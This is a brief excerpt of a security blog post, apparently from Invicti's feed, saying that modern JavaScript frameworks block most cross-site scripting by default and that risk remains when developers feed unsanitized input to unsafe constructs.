When used correctly, modern JavaScript frameworks can prevent the majority of XSS vulnerabilities by default. In some cases, though, cross-site scripting is still possible in framework-based applications, especially when developers deliberately or unknowingly use some of the available unsafe constructs and feed them unsanitized user inputs.

 

Learn more about cross-site scripting in React web applications

The post How to prevent XSS attacks appeared first on Invicti.

]]>